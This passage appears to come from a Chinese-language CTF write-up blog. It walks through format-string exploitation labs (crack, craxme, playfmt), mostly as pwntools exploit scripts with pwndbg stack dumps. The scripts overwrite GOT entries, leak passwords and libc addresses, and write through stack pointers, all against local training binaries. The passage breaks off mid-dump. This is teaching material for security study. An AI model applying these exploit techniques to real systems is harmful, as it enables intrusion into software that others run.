class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><p>稍微解释一下，先通过主函数中可以控制的 20个 字节将 esp 指针劫持到可控的 bss 段，然后就可以可以在 bss 段为所欲为了。</p> <p>关于 stack-pivot，pwnable.kr 的 simple_login 是很经典的题目，放上一篇这道题的很不错的 <a href="https://blog.csdn.net/yuanyunfeng3/article/details/51456049"><strong>wp</strong></a></p> <p>这个还有个问题，sendline 会 gg，send 就可以，在 atum 大佬的 <a href="http://atum.li/2016/09/20/ctf-strange/"><strong>博客</strong></a> 上找到了原因 另外不建议把迁移后的栈放在 bss 段开头, 因为 stdout, stdin, stderr 等结构体往往存储在这里, 破坏这些结构体很可能会引起输入输出的错误</p> <h3 id="lab7-crack">lab7-crack</h3> <p>输出 name 时有明显的格式化字符串漏洞，这个题的思路有很多，可以利用 fsb 改写 password，或者 leak 出 password，也可以直接通过 fsb，hijack puts_got 到 system(&ldquo;cat flag&rdquo;) 处（注意这里 printf 实际调用了 puts）</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">lab7</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">hijack</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">putsGot</span> <span class="o">=</span> <span class="mh">0x804A01C</span> <span class="n">bullet</span> <span class="o">=</span> <span class="mh">0x804872B</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./crack&#34;</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">fmtstr_payload</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="p">{</span><span class="n">putsGot</span><span class="p">:</span> <span class="n">bullet</span><span class="p">})</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; ? &#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> <span class="n">lab7</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">overwrite</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">pwdAddr</span> <span class="o">=</span> <span class="mh">0x804A048</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">fmtstr_payload</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="p">{</span><span class="n">pwdAddr</span><span class="p">:</span> <span class="mi">6</span><span class="p">})</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./crack&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; ? &#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="s2">&#34;6&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> <span class="n">lab7</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">leak</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">pwdAddr</span> <span class="o">=</span> <span class="mh">0x804A048</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">p32</span><span class="p">(</span><span class="n">pwdAddr</span><span class="p">)</span> <span class="o">+</span> <span class="s2">&#34;|%10$s||&#34;</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./crack&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; ? &#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;|&#34;</span><span class="p">)</span> <span class="n">leaked</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;||&#34;</span><span class="p">,</span> <span class="n">drop</span> <span class="o">=</span> <span class="bp">True</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">leaked</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><p>32位的 binary 可以直接使用 pwntools 封装好的<strong>fmtstr_payload</strong>函数：</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fq2zoc31gjj30om0p3jv2.jpg" alt=""></p> <h3 id="lab8-craxme">lab8-craxme</h3> <p>同样是32位的 fsb，直接用 fmtstr_payload 就可以解决</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">lab8</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="n">argv</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">magicAddr</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./craxme&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s2">&#34;magic&#34;</span><span class="p">]</span> <span class="k">if</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;1&#34;</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">fmtstr_payload</span><span class="p">(</span><span class="mi">7</span><span class="p">,</span> <span class="p">{</span><span class="n">magicAddr</span><span class="p">:</span> <span class="mh">0xda</span><span class="p">})</span> <span class="k">else</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">fmtstr_payload</span><span class="p">(</span><span class="mi">7</span><span class="p">,</span> <span class="p">{</span><span class="n">magicAddr</span><span class="p">:</span> <span class="mh">0xfaceb00c</span><span class="p">})</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./craxme&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><p>如果想要自己实现 fmtstr_payload 功能，可以参考这篇 <a href="https://paper.seebug.org/246/"><strong>文章</strong></a></p> <h3 id="lab9-playfmt">lab9-playfmt</h3> <p>和上一道题相比, lab9 的格式化字符串不在栈上,在全局变量 (.bss) 段, 因此我们就不能直接控制栈上的变量来进行修改 got 等行为,但可以通过控制</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">Breakpoint *do_fmt+64 pwndbg&gt; stack 25 00:0000│ esp 0xffffd0c0 —▸ 0x804a060 (buf) ◂— 0xa7025 /* &#39;%p\n&#39; */ 01:0004│ 0xffffd0c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* &#39;quit&#39; */ 02:0008│ 0xffffd0c8 ◂— 0x4 03:000c│ 0xffffd0cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 04:0010│ 0xffffd0d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d 05:0014│ 0xffffd0d4 —▸ 0xf7fa4000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 06:0018│ ebp 0xffffd0d8 —▸ 0xffffd0e8 —▸ 0xffffd0f8 ◂— 0x0 07:001c│ 0xffffd0dc —▸ 0x8048584 (play+59) ◂— nop 08:0020│ 0xffffd0e0 —▸ 0xf7fa4d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 09:0024│ 0xffffd0e4 ◂— 0x0 0a:0028│ 0xffffd0e8 —▸ 0xffffd0f8 ◂— 0x0 0b:002c│ 0xffffd0ec —▸ 0x80485b1 (main+42) ◂— nop 0c:0030│ 0xffffd0f0 —▸ 0xf7fa43dc (__exit_funcs) —▸ 0xf7fa51e0 (initial) ◂— 0x0 0d:0034│ 0xffffd0f4 —▸ 0xffffd110 ◂— 0x1 0e:0038│ 0xffffd0f8 ◂— 0x0 0f:003c│ 0xffffd0fc —▸ 0xf7e09276 (__libc_start_main+246) ◂— add esp, 0x10 10:0040│ 0xffffd100 ◂— 0x1 11:0044│ 0xffffd104 —▸ 0xf7fa4000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 12:0048│ 0xffffd108 ◂— 0x0 13:004c│ 0xffffd10c —▸ 0xf7e09276 (__libc_start_main+246) ◂— add esp, 0x10 14:0050│ 0xffffd110 ◂— 0x1 15:0054│ 0xffffd114 —▸ 0xffffd1a4 —▸ 0xffffd342 ◂— 0x6d6f682f (&#39;/hom&#39;) 16:0058│ 0xffffd118 —▸ 0xffffd1ac —▸ 0xffffd375 ◂— 0x5f474458 (&#39;XDG_&#39;) 17:005c│ 0xffffd11c ◂— 0x0 ... ↓ pwndbg&gt; </code></pre></td></tr></table> </div> </div><p>如上 0x15, 0x16, 0x06 出的指针指向栈上的变量, 如修改 0x15 处为</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">15:0054│ 0xffffd114 —▸ 0xffffd1a4 —▸ 0xffffd0dc —▸ 0x8048584 (play+59) </code></pre></td></tr></table> </div> </div><p>然后再将 0x8048584 修改为某个 got 地址, 就可以实现间接地写 got 了, 这种方式也基本成了一种固定的套路, 如 hackme.inndy 的 <a href="https://github.com/0x01f/pwn_repo/tree/master/inndy_echo3">echo3</a> 一道题</p> <h4 id="exp">exp</h4> <p>为了解释清楚整个利用的过程, 我把我调试时的信息也放到脚本里了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span><span class="lnt">174 </span><span class="lnt">175 </span><span class="lnt">176 </span><span class="lnt">177 </span><span class="lnt">178 </span><span class="lnt">179 </span><span class="lnt">180 </span><span class="lnt">181 </span><span class="lnt">182 </span><span class="lnt">183 </span><span class="lnt">184 </span><span class="lnt">185 </span><span class="lnt">186 </span><span class="lnt">187 </span><span class="lnt">188 </span><span class="lnt">189 </span><span class="lnt">190 </span><span class="lnt">191 </span><span class="lnt">192 </span><span class="lnt">193 </span><span class="lnt">194 </span><span class="lnt">195 </span><span class="lnt">196 </span><span class="lnt">197 </span><span class="lnt">198 </span><span class="lnt">199 </span><span class="lnt">200 </span><span class="lnt">201 </span><span class="lnt">202 </span><span class="lnt">203 </span><span class="lnt">204 </span><span class="lnt">205 </span><span class="lnt">206 </span><span class="lnt">207 </span><span class="lnt">208 </span><span class="lnt">209 </span><span class="lnt">210 </span><span class="lnt">211 </span><span class="lnt">212 </span><span class="lnt">213 </span><span class="lnt">214 </span><span class="lnt">215 </span><span class="lnt">216 </span><span class="lnt">217 </span><span class="lnt">218 </span><span class="lnt">219 </span><span class="lnt">220 </span><span class="lnt">221 </span><span class="lnt">222 </span><span class="lnt">223 </span><span class="lnt">224 </span><span class="lnt">225 </span><span class="lnt">226 </span><span class="lnt">227 </span><span class="lnt">228 </span><span class="lnt">229 </span><span class="lnt">230 </span><span class="lnt">231 </span><span class="lnt">232 </span><span class="lnt">233 </span><span class="lnt">234 </span><span class="lnt">235 </span><span class="lnt">236 </span><span class="lnt">237 </span><span class="lnt">238 </span><span class="lnt">239 </span><span class="lnt">240 </span><span class="lnt">241 </span><span class="lnt">242 </span><span class="lnt">243 </span><span class="lnt">244 </span><span class="lnt">245 </span><span class="lnt">246 </span><span class="lnt">247 </span><span class="lnt">248 </span><span class="lnt">249 </span><span class="lnt">250 </span><span class="lnt">251 </span><span class="lnt">252 </span><span class="lnt">253 </span><span class="lnt">254 </span><span class="lnt">255 </span><span class="lnt">256 </span><span class="lnt">257 </span><span class="lnt">258 </span><span class="lnt">259 </span><span class="lnt">260 </span><span class="lnt">261 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;i386&#39;</span> <span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;deepin-terminal&#39;</span><span class="p">,</span> <span class="s1">&#39;-x&#39;</span><span class="p">,</span> <span class="s1">&#39;sh&#39;</span><span class="p">,</span> <span class="s1">&#39;-c&#39;</span><span class="p">]</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./playfmt&#34;</span><span class="p">)</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;/lib/i386-linux-gnu/libc.so.6&#34;</span><span class="p">)</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./playfmt&#34;</span><span class="p">)</span> <span class="s1">&#39;&#39;&#39; </span><span class="s1">Breakpoint *do_fmt+64 </span><span class="s1">pwndbg&gt; x/3s 0x804a060 </span><span class="s1">0x804a060 &lt;buf&gt;: &#34;..%8$p....%6$p.&#34;... </span><span class="s1">0x804a06f &lt;buf+15&gt;: &#34;.11111111&#34; </span><span class="s1">0x804a079 &lt;buf+25&gt;: &#34;&#34; </span><span class="s1">pwndbg&gt; stack 25 </span><span class="s1">00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x38252e2e (&#39;..%8&#39;) </span><span class="s1">01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* &#39;quit&#39; */ </span><span class="s1">02:0008│ 0xffa077c8 ◂— 0x4 </span><span class="s1">03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 </span><span class="s1">04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d </span><span class="s1">05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1">06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1">07:001c│ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop </span><span class="s1">08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 </span><span class="s1">09:0024│ 0xffa077e4 ◂— 0x0 </span><span class="s1">0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1">0b:002c│ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop </span><span class="s1">0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 </span><span class="s1">0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 </span><span class="s1">0e:0038│ 0xffa077f8 ◂— 0x0 </span><span class="s1">0f:003c│ 0xffa077fc —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 </span><span class="s1">10:0040│ 0xffa07800 ◂— 0x1 </span><span class="s1">11:0044│ 0xffa07804 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1">12:0048│ 0xffa07808 ◂— 0x0 </span><span class="s1">13:004c│ 0xffa0780c —▸ 0xf7d15276 (__libc_start_main+246) ◂— add esp, 0x10 </span><span class="s1">14:0050│ 0xffa07810 ◂— 0x1 </span><span class="s1">15:0054│ 0xffa07814 —▸ 0xffa078a4 —▸ 0xffa083d6 ◂— &#39;./playfmt&#39; </span><span class="s1">16:0058│ 0xffa07818 —▸ 0xffa078ac —▸ 0xffa083e0 ◂— &#39;NO_AT_BRIDGE=1&#39; </span><span class="s1">17:005c│ 0xffa0781c ◂— 0x0 </span><span class="s1">... ↓ </span><span class="s1">&#39;&#39;&#39;</span> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">,</span> <span class="s2">&#34;b *do_fmt+64</span><span class="se">\n</span><span class="s2">c&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="s2">&#34;..%8$p....%6$p..11111111</span><span class="se">\0</span><span class="s2">&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;..&#34;</span><span class="p">)</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;..&#34;</span><span class="p">,</span> <span class="n">drop</span> <span class="o">=</span> <span class="bp">True</span><span class="p">),</span> <span class="mi">16</span><span class="p">)</span> <span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;_IO_2_1_stdout_&#39;</span><span class="p">]</span> <span class="n">success</span><span class="p">(</span><span class="s2">&#34;libc.address -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">address</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;..&#34;</span><span class="p">)</span> <span class="n">stack</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;..&#34;</span><span class="p">,</span> <span class="n">drop</span> <span class="o">=</span> <span class="bp">True</span><span class="p">),</span> <span class="mi">16</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0x28</span> <span class="n">success</span><span class="p">(</span><span class="s2">&#34;stack -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">stack</span><span class="p">))</span> <span class="n">pause</span><span class="p">()</span> <span class="s1">&#39;&#39;&#39; </span><span class="s1">pwndbg&gt; x/3s 0x804a060 </span><span class="s1">0x804a060 &lt;buf&gt;: &#34;</span><span class="si">%30684c</span><span class="s1">%21$hn%1&#34;... </span><span class="s1">0x804a06f &lt;buf+15&gt;: &#34;6c%22$hn2222222&#34;... </span><span class="s1">0x804a07e &lt;buf+30&gt;: &#34;2&#34; </span><span class="s1">pwndbg&gt; stack 25 </span><span class="s1">00:0000│ esp 0xffa077c0 —▸ 0x804a060 (buf) ◂— 0x36303325 (&#39;%306&#39;) </span><span class="s1">01:0004│ 0xffa077c4 —▸ 0x8048640 ◂— jno 0x80486b7 /* &#39;quit&#39; */ </span><span class="s1">02:0008│ 0xffa077c8 ◂— 0x4 </span><span class="s1">03:000c│ 0xffa077cc —▸ 0x804857c (play+51) ◂— add esp, 0x10 </span><span class="s1">04:0010│ 0xffa077d0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d </span><span class="s1">05:0014│ 0xffa077d4 —▸ 0xf7eb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 </span><span class="s1">06:0018│ ebp 0xffa077d8 —▸ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1">07:001c│ 0xffa077dc —▸ 0x8048584 (play+59) ◂— nop </span><span class="s1">08:0020│ 0xffa077e0 —▸ 0xf7eb0d60 (_IO_2_1_stdout_) ◂— 0xfbad2887 </span><span class="s1">09:0024│ 0xffa077e4 ◂— 0x0 </span><span class="s1">0a:0028│ 0xffa077e8 —▸ 0xffa077f8 ◂— 0x0 </span><span class="s1">0b:002c│ 0xffa077ec —▸ 0x80485b1 (main+42) ◂— nop </span><span class="s1">0c:0030│ 0xffa077f0 —▸ 0xf7eb03dc (__exit_funcs) —▸ 0xf7eb11e0 (initial) ◂— 0x0 </span><span class="s1">0d:0034│ 0xffa077f4 —▸ 0xffa07810 ◂— 0x1 </span><span class="s1">0e:0038│ 0xffa077f8 ◂— 0x0 </span><span class="s1">0f:003c│ 0xffa077fc —▸ 